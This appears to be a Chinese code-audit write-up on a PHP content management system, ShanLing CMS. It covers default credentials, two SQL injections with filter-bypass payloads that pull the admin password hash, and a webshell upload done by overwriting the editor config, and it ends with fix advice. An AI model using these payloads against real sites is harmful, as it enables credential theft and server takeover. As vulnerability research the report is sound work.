闪灵cms高校版代码审计
字数 1149 2025-08-06 08:35:09

闪灵CMS高校版代码审计报告

系统概述

闪灵CMS高校版是一款基于PHP开发的智能企业建站系统,具有以下特点:

  • 允许用户在短时间内快速搭建企业网站
  • 无需编程知识即可使用
  • 提供在线建站功能

漏洞1:默认密码

漏洞描述

系统安装后存在多个默认用户账户,这些账户使用弱密码且容易被解密。

技术细节

  1. 默认用户密码存储在数据库中(非管理员账户,仅为普通用户)
  2. 示例密码:7FEF6171469E80D32C0559F88B377245(解密后为admin888
  3. 默认登录凭证:admin/admin888
  4. 登录地址:http://localhost/member/member_login.php

验证方法

  1. 通过数据库查看默认用户
  2. 使用默认凭证尝试登录用户后台

影响范围

  • 系统默认开启用户登录后台功能
  • 实际测试中成功率较高

漏洞2:用户后台UPDATE注入

漏洞位置

member/member_edit.php

漏洞成因

  1. 参数直接从POST请求获取
  2. 仅经过htmlspecialchars过滤
  3. 直接拼接SQL语句

防护机制分析

  1. function/function.php中有正则表达式检测敏感字符
  2. 匹配到敏感字符会终止程序执行
  3. 参数还经过RemoveXSS函数过滤

绕过方法

  1. 使用HTML实体编码绕过检测
    • 例如:'编码为&#39
  2. 通过URL编码进一步处理

验证步骤

  1. 开启MySQL日志:
    set global general_log=ON;
    show variables LIKE '%general_log%';
    
  2. 测试注入效果

利用Payload

%26%2339,M_info=(%26%23115elect a_pwd from sl_admin),M_add=%26%2339

漏洞3:论坛评论INSERT注入

漏洞位置

bbs/item.php

漏洞特点

  • 与漏洞2成因相同
  • 注入方式改为INSERT注入

利用Payload

aaaaa%26%2339,%26%23392023-01-01%26%2339,7,1,1),(%26%2339aaa%26%2339,(%26%23115elect a_pwd from sl_admin), %26%23391010-02-02%26%2339,7,1,1) %23

漏洞4:管理后台文件上传

漏洞描述

组合漏洞利用,通过修改上传配置实现任意文件上传。

利用步骤

1. 修改上传配置

  1. 系统后台使用黑名单方式限制上传格式
  2. 默认不允许上传PHP文件
  3. 系统包含UE编辑器

2. 具体利用流程

  1. 修改config.json文件,添加允许上传PHP:
    {
      "allowFiles": [".php"]
    }
    
  2. 后台修改安全配置,允许上传JSON格式文件
  3. 上传修改后的config.json覆盖原文件
  4. 通过UE编辑器上传Webshell

3. 上传Webshell请求示例

POST /ueditor/php/controller.php?action=uploadfile HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryG33bK0VpwNWgBEHF
Connection: close

------WebKitFormBoundaryG33bK0VpwNWgBEHF
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: application/octet-stream

<? phpinfo(); ?>
------WebKitFormBoundaryG33bK0VpwNWgBEHF--

修复建议

  1. 默认密码问题

    • 强制用户在首次登录时修改密码
    • 删除或禁用默认账户
  2. SQL注入防护

    • 使用预处理语句替代直接拼接SQL
    • 统一过滤机制,避免多层级过滤不一致
    • 加强输入验证
  3. 文件上传漏洞

    • 使用白名单机制替代黑名单
    • 限制配置文件修改权限
    • 对上传文件进行内容检查
  4. 其他建议

    • 定期安全审计
    • 保持系统更新
    • 最小权限原则配置

总结

闪灵CMS高校版存在多个高危漏洞,攻击者可以利用这些漏洞获取系统权限、窃取敏感数据。建议用户及时更新系统或采取相应防护措施。

闪灵CMS高校版代码审计报告 系统概述 闪灵CMS高校版是一款基于PHP开发的智能企业建站系统,具有以下特点: 允许用户在短时间内快速搭建企业网站 无需编程知识即可使用 提供在线建站功能 漏洞1:默认密码 漏洞描述 系统安装后存在多个默认用户账户,这些账户使用弱密码且容易被解密。 技术细节 默认用户密码存储在数据库中(非管理员账户,仅为普通用户) 示例密码: 7FEF6171469E80D32C0559F88B377245 (解密后为 admin888 ) 默认登录凭证: admin/admin888 登录地址: http://localhost/member/member_login.php 验证方法 通过数据库查看默认用户 使用默认凭证尝试登录用户后台 影响范围 系统默认开启用户登录后台功能 实际测试中成功率较高 漏洞2:用户后台UPDATE注入 漏洞位置 member/member_edit.php 漏洞成因 参数直接从POST请求获取 仅经过 htmlspecialchars 过滤 直接拼接SQL语句 防护机制分析 function/function.php 中有正则表达式检测敏感字符 匹配到敏感字符会终止程序执行 参数还经过 RemoveXSS 函数过滤 绕过方法 使用HTML实体编码绕过检测 例如: ' 编码为 &#39 通过URL编码进一步处理 验证步骤 开启MySQL日志: 测试注入效果 利用Payload 漏洞3:论坛评论INSERT注入 漏洞位置 bbs/item.php 漏洞特点 与漏洞2成因相同 注入方式改为INSERT注入 利用Payload 漏洞4:管理后台文件上传 漏洞描述 组合漏洞利用,通过修改上传配置实现任意文件上传。 利用步骤 1. 修改上传配置 系统后台使用黑名单方式限制上传格式 默认不允许上传PHP文件 系统包含UE编辑器 2. 具体利用流程 修改 config.json 文件,添加允许上传PHP: 后台修改安全配置,允许上传JSON格式文件 上传修改后的 config.json 覆盖原文件 通过UE编辑器上传Webshell 3. 上传Webshell请求示例 修复建议 默认密码问题 : 强制用户在首次登录时修改密码 删除或禁用默认账户 SQL注入防护 : 使用预处理语句替代直接拼接SQL 统一过滤机制,避免多层级过滤不一致 加强输入验证 文件上传漏洞 : 使用白名单机制替代黑名单 限制配置文件修改权限 对上传文件进行内容检查 其他建议 : 定期安全审计 保持系统更新 最小权限原则配置 总结 闪灵CMS高校版存在多个高危漏洞,攻击者可以利用这些漏洞获取系统权限、窃取敏感数据。建议用户及时更新系统或采取相应防护措施。